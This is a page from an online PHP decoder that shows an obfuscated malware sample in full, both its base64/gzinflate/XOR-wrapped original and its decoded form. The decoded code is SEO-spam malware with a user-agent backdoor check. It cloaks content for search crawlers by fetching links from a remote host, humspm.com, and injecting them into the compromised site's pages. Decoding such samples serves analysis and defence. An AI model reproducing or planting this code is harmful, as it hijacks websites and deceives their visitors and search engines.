Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php Error_Reporting(0); $xVebaPURjEzLc="pVhtc5tGEI7lxAghozHC+Eoq9y/4m7829owMmhhq8SIzSLrJ..

Decoded Output download


if ($_SERVER['HTTP_USER_AGENT']=="ANTIPIDERSIA") {
die("<font color='green'>CHETKO</font>#HUMSPM-v1.11");
}
$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
if (!preg_match('/ahrefs|SolomonoBot|SearchBot|MJ12bot|baiduspider|Synthesio|Purebot|Parking Domains|netEstate|majestic|selfbot/i', $server_user_agent)) {

$google = FALSE;
if (preg_match('/Googlebot|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|http|bot|spider|crawler/i', $server_user_agent)) {
$google = true;
}

  $owner_host="humspm.com";
  $remhost = str_replace("www.","",$_SERVER['HTTP_HOST']);
  $rempage = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  $rempage = urlencode($rempage);
  $linksurl = "http://".$owner_host."/counter.php?md5=".md5($remhost.$_SERVER['REQUEST_URI']."links")."&hst=".$remhost."&page=".$rempage;
  $selfagent = 'selfbot';
  $useragent = 'Opera 10.00';
 
function str_replace_once($search, $replace, $text) { 
   $pos = stripos($text, $search); 
   return $pos!==false ? substr_replace($text, $replace, $pos, strlen($search)) : $text; 
} 

function curPageURL() {
 $pageURL = 'http';
 if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;
}

function get_mydata($uri,$useragent) {
       $ch = curl_init();
       curl_setopt ($ch, CURLOPT_URL,$uri);
       curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
       curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
       $result = curl_exec ($ch);
       curl_close($ch);
       return $result;
    }

if ($google == TRUE) {
$selfuri = curPageURL();

$data = get_mydata($selfuri,$selfagent);

$links_file = get_mydata($linksurl,$useragent);
$links_file = str_replace('|||','',$links_file);
$links = explode("
", $links_file);
$l_count = count($links);

function check($param1,$param2) { 
  return stripos(strtolower($param1),strtolower($param2));
  }
  
function makelinks($data) {
global $links;

 $pagecontent = $data;
 $_2 = 1;
 $_11 = false;
 $_12="";
 $_13 = check($pagecontent,"<body");
 if($_13!==false){
 $_14=array();
 $_15=array();
 $_16=array();
 $_17=array();
 $_18=array();
 $_19=array();
 $strfrag=substr($pagecontent,$_13);
 $_21=strip_tags($strfrag);
 
  $_22="/[a-z]{2,}+ and /";
 preg_match_all($_22,$_21,$_14,PREG_OFFSET_CAPTURE);
 $_23="/[a-z]{2,}+ the /";
 preg_match_all($_23,$_21,$_15,PREG_OFFSET_CAPTURE);
 $_24="/[a-z]{2,}+ of /";
 preg_match_all($_24,$_21,$_16,PREG_OFFSET_CAPTURE);
 $_25="/[a-z]{2,}+ to /";
 preg_match_all($_25,$_21,$_17,PREG_OFFSET_CAPTURE);
 $_26="/[a-z]{2,}+ on /";
 preg_match_all($_26,$_21,$_18,PREG_OFFSET_CAPTURE);
 $_27="/[a-z]{2,}+ is /";
 preg_match_all($_27,$_21,$_19,PREG_OFFSET_CAPTURE);
 $_28="/[a-z]{2,}+ de /";
 preg_match_all($_28,$_21,$_29,PREG_OFFSET_CAPTURE);
 $_30="/[a-z]{2,}+ en /";
 preg_match_all($_30,$_21,$_31,PREG_OFFSET_CAPTURE);
 $_32="/[a-z]{2,}+ und /";
 preg_match_all($_32,$_21,$_33,PREG_OFFSET_CAPTURE);
 $_34="/[a-z]{2,}+ auf /";
 preg_match_all($_34,$_21,$_35,PREG_OFFSET_CAPTURE);
 $_36="/[a-z]{2,}+ y /";
 preg_match_all($_36,$_21,$_37,PREG_OFFSET_CAPTURE);
 $_38="/[a-z]{2,}+ e /";
 preg_match_all($_38,$_21,$_39,PREG_OFFSET_CAPTURE);
 $_40="/[a-z]{2,}+ et /";
 preg_match_all($_40,$_21,$_41,PREG_OFFSET_CAPTURE);
 $_42="/[a-z]{2,}+ la /";
 preg_match_all($_42,$_21,$_43,PREG_OFFSET_CAPTURE);
 $_44="/[a-z]{2,}+ des /";
 preg_match_all($_44,$_21,$_45,PREG_OFFSET_CAPTURE);
 $_46="/[a-z]{2,}+ der /";
 preg_match_all($_46,$_21,$_47,PREG_OFFSET_CAPTURE);
 $_48="/[a-z]{2,}+ die /";
 preg_match_all($_48,$_21,$_49,PREG_OFFSET_CAPTURE);
 
 $plines=array();
 
 foreach($_14[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_15[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_16[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_17[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_18[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_19[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_29[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_31[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_33[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_35[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_37[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_39[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_41[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_43[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_45[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_47[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 foreach($_49[0]as $plvalue) {
 $plines[$plvalue[0]]=1;
 }
 
 $plines_keys=array_keys($plines);
 $_53=$strfrag;
 $_54=-1;
 foreach($plines_keys as $_55){
 $_54++;
 if(($_54%$_2)!= 0) continue;
 $_56=0;
 $_57=false;
 $_58=0;
 do { $_59=stripos($_53,$_55,$_56);
 $_56=$_59+strlen($_55);
 if($_59!==false) { 
 $_60=strrpos(substr($_53,0,$_59),">");
 $_61=strrpos(substr($_53,0,$_59),"<");
 if($_60===false){ 
 $_60=0;
 } 
 if($_61===false) {
 $_11=true;
 break;
 } if($_60<=$_61) { continue; }
 if(count($links)<=0) break;
 $_58=trim(array_shift($links));
 if($_58==NULL || strlen($_58) < 4) { break; 
 }
 $_53=substr($_53,0,$_59+strlen($_55)).$_58." ".substr($_53,$_59+strlen($_55));
 $_57=true;
 } else { break; }
 } while(!$_57);
  if($_11) break;
  if(count($links)<=0)break;
  }
  $_12=substr($pagecontent,0,$_13).$_53;
  } else {
  $_11=true;
  $_12=$pagecontent;
  }
  $data=$_12;
  return $data;
  }
  
echo makelinks($data);
exit;
}

}
eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhWT1RORmQydE9VWHB5UFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaFVVek15YWtGNGEwZDNTejFpWVhObE5qUmZaR1ZqYjJSbEtDSmpNMUo1WWtkV2RTSXBPeVI0V2taUFRGWmxla0Y1ZVZkMlBXSmhjMlUyTkY5a1pXTnZaR1VvSWxreWFIa2lLVHNrZUVsSldteENVRFY1VDJsMFJEMWlZWE5sTmpSZlpHVmpiMlJsS0NKaU0wcHJJaWs3SkhoRk5IbHZlR050VVRSVFBXSmhjMlUyTkY5a1pXTnZaR1VvSWxvemNIQmliVnB6V1ZoU2JDSXBPdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoV1pXSmhVRlZTYWtWNlRHTTlKSGhGTkhsdmVHTnRVVFJUS0NSNFZUa3pSWGRyVGxGNmNpZ2tlRlpsWW1GUVZWSnFSWHBNWXlrcE95UjRSR2xIVlVaRFIyNUtVSHBxUFNSNFZGTXpNbXBCZUd0SGQwc29KSGhXWldKaFVGVlNha1Y2VEdNcE93PT0iKSk7"));eval(base64_decode("JHh0c21STDVMUFk1PScnO2ZvcigkeElvV0FaUTVMWWJIcz0wOyR4SW9XQVpRNUxZYkhzPCR4RGlHVUZDR25KUHpqOyR4SW9XQVpRNUxZYkhzKyspeyR4dHNtUkw1TFBZNS49JHhaRk9MVmV6QXl5V3YoKCR4SUlabEJQNXlPaXREKCR4VmViYVBVUmpFekxjWyR4SW9XQVpRNUxZYkhzXSleMzk4MTM4NDI2KSk7fWV2YWwoJHh0c21STDVMUFk1KTs="));eval(base64_decode("JHhVOTNFd2tOUXpyPWJhc2U2NF9kZWNvZGUoIlltRnpaVFkwWDJSbFkyOWtaUT09Iik7JHhUUzMyakF4a0d3Sz1iYXNlNjRfZGVjb2RlKCJjM1J5YkdWdSIpOyR4WkZPTFZlekF5eVd2PWJhc2U2NF9kZWNvZGUoIlkyaHkiKTskeElJWmxCUDV5T2l0RD1iYXNlNjRfZGVjb2RlKCJiM0prIik7JHhFNHlveGNtUTRTPWJhc2U2NF9kZWNvZGUoIlozcHBibVpzWVhSbCIpOw=="));eval(base64_decode("JHhWZWJhUFVSakV6TGM9JHhFNHlveGNtUTRTKCR4VTkzRXdrTlF6cigkeFZlYmFQVVJqRXpMYykpOyR4RGlHVUZDR25KUHpqPSR4VFMzMmpBeGtHd0soJHhWZWJhUFVSakV6TGMpOw=="));$xU93EwkNQzr=base64_decode("YmFzZTY0X2RlY29kZQ==");$xTS32jAxkGwK=base64_decode("c3RybGVu");$xZFOLVezAyyWv=base64_decode("Y2hy");$xIIZlBP5yOitD=base64_decode("b3Jk");$xE4yoxcmQ4S=base64_decode("Z3ppbmZsYXRl");

Did this file decode correctly?

Original Code

<?php Error_Reporting(0); $xVebaPURjEzLc="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";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doV1QxUk9SbVF5ZEU5VldIQjVVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkd4MFVtNXdZVlpHYTNkWFJFcFRZa1pyZVU5WGRHRlZWREE1U1dsck4wcElhRlZWZWsxNVlXdEdOR0V3WkROVGVqRnBXVmhPYkU1cVVtWmFSMVpxWWpKU2JFdERTbXBOTVVvMVdXdGtWMlJUU1hCUGVWSTBWMnRhVUZSR1dteGxhMFkxWlZaa01sQlhTbWhqTWxVeVRrWTVhMXBYVG5aYVIxVnZTV3hyZVdGSWEybExWSE5yWlVWc1NsZHRlRU5WUkZZMVZESnNNRkpFTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FVMHdjSEpKYVdzM1NraG9SazVJYkhabFIwNTBWVlJTVkZCWFNtaGpNbFV5VGtZNWExcFhUblphUjFWdlNXeHZlbU5JUW1saVZuQjZWMVpvVTJKRFNYQlBkejA5SWlrcE8yVjJZV3dvWW1GelpUWTBYMlJsWTI5a1pTZ2lTa2hvVjFwWFNtaFZSbFpUWVd0V05sUkhUVGxLU0doR1RraHNkbVZIVG5SVlZGSlVTME5TTkZaVWEzcFNXR1J5Vkd4R05tTnBaMnRsUmxwc1dXMUdVVlpXU25GU1dIQk5XWGxyY0U5NVVqUlNSMnhJVmxWYVJGSXlOVXRWU0hCeFVGTlNORlpHVFhwTmJYQkNaVWQwU0dRd2MyOUtTR2hYV2xkS2FGVkdWbE5oYTFZMlZFZE5jRTkzUFQwaUtTazciKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGgwYzIxU1REVk1VRmsxUFNjbk8yWnZjaWdrZUVsdlYwRmFVVFZNV1dKSWN6MHdPeVI0U1c5WFFWcFJOVXhaWWtoelBDUjRSR2xIVlVaRFIyNUtVSHBxT3lSNFNXOVhRVnBSTlV4WllraHpLeXNwZXlSNGRITnRVa3cxVEZCWk5TNDlKSGhhUms5TVZtVjZRWGw1VjNZb0tDUjRTVWxhYkVKUU5YbFBhWFJFS0NSNFZtVmlZVkJWVW1wRmVreGpXeVI0U1c5WFFWcFJOVXhaWWtoelhTbGVNems0TVRNNE5ESTJLU2s3ZldWMllXd29KSGgwYzIxU1REVk1VRmsxS1RzPSIpKTs='\x29\x29\x3B",".");return;?>

Function Calls

chr 5888
ord 5888
strlen 1
gzinflate 1
preg_replace 1
base64_decode 2
Error_Reporting 1

Variables

$xE4yoxcmQ4S gzinflate
$xU93EwkNQzr base64_decode
$xtsmRL5LPY5 if ($_SERVER['HTTP_USER_AGENT']=="ANTIPIDERSIA") { die("<..
$xTS32jAxkGwK strlen
$xDiGUFCGnJPzj 5888
$xIIZlBP5yOitD ord
$xIoWAZQ5LYbHs 5888
$xVebaPURjEzLc 70S\eihlharnnjeoihe{}tng{tnsjs~his{A70^S_\UTNYUVUH]H__Tyrnqu..
$xZFOLVezAyyWv chr

Stats

MD5 07f1789c1609e52e5d763675e174bf36
Eval Count 11
Decode Time 19822 ms